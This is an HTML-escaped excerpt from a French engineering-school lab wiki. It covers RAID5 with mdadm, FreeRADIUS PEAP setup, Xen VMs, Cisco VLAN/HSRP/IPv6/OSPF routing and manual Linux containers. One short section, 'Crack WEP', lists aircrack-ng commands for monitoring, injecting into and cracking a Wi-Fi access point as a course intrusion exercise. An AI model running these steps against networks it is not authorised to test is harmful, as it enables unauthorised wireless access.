Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49092</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49092"/>
				<updated>2018-12-21T15:19:20Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.5 Interconnexion avec Internet IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
